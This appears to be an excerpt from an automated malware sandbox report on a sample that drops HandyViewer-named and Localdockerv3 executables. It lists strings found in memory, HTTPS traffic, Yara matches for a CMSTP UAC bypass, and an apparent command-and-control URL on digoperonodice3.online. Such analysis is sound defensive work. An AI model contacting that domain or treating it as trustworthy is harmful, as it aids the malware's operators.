Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.???.xx/?search=%s
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: hv.exe, 00000002.00000002.1486704045.000000000C77A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.00000000054DB000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.00000000027BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.com
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.de
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
Source: Localdockerv3.exe, 00000008.00000000.1734434382.0000000140156000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: http://www.surfok.de/
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: Localdockerv3.exe, 00000008.00000002.2160225088.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online/
Source: Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online/L
Source: Localdockerv3.exe, 00000008.00000003.1897374947.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1897886861.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1916979579.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online/Ohio-Vall9~
Source: Localdockerv3.exe, 00000008.00000002.2160661904.0000000000AD3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay
Source: Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=
Source: Localdockerv3.exe, 00000008.00000002.2169892760.0000000007F50000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online:443
Source: Localdockerv3.exe, 00000008.00000003.2112186023.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://digoperonodice3.online:443/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4i
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1450461576.0000000001546000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.handyviewer.com
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/check-version.php?version=openS
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/contact.htmlopenSV
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/donate.htmlopen
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/donate.htmlopenS
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/manual/openU
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/openS
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/openSV
Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.handyviewer.com/openhM
Source: hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.handyviewer.com/openhME

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49723 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.cmd.exe.2d607f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.Localdockerv3.exe.284faed.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.cmd.exe.2c34a28.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.Localdockerv3.exe.2788a20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.Localdockerv3.exe.28506ed.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.Localdockerv3.exe.280aa20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.Localdockerv3.exe.27cdaed.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_00404FAA	0_2_00404FAA
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_0041206B	0_2_0041206B
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_0041022D	0_2_0041022D
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_00411F91	0_2_00411F91
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CAF8856	2_2_6CAF8856
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD2860	2_2_6CBD2860
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD51C0	2_2_6CBD51C0
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBCE530	2_2_6CBCE530
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBCDD30	2_2_6CBCDD30
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD4AD0	2_2_6CBD4AD0
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBCE610	2_2_6CBCE610
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBF0670	2_2_6CBF0670
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD1E50	2_2_6CBD1E50
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD4A40	2_2_6CBD4A40
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD2330	2_2_6CBD2330
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD2730	2_2_6CBD2730
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBD1770	2_2_6CBD1770
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CBCD760	2_2_6CBCD760
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3BD400	3_2_6C3BD400
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B2860	3_2_6C3B2860
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3BD4E0	3_2_6C3BD4E0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3ADD30	3_2_6C3ADD30
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3AE530	3_2_6C3AE530
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B51C0	3_2_6C3B51C0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3AE610	3_2_6C3AE610
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B1E50	3_2_6C3B1E50
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B4A40	3_2_6C3B4A40
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B3AB0	3_2_6C3B3AB0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B4AD0	3_2_6C3B4AD0
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Code function: 3_2_6C3B32C0	3_2_6C3B32C0
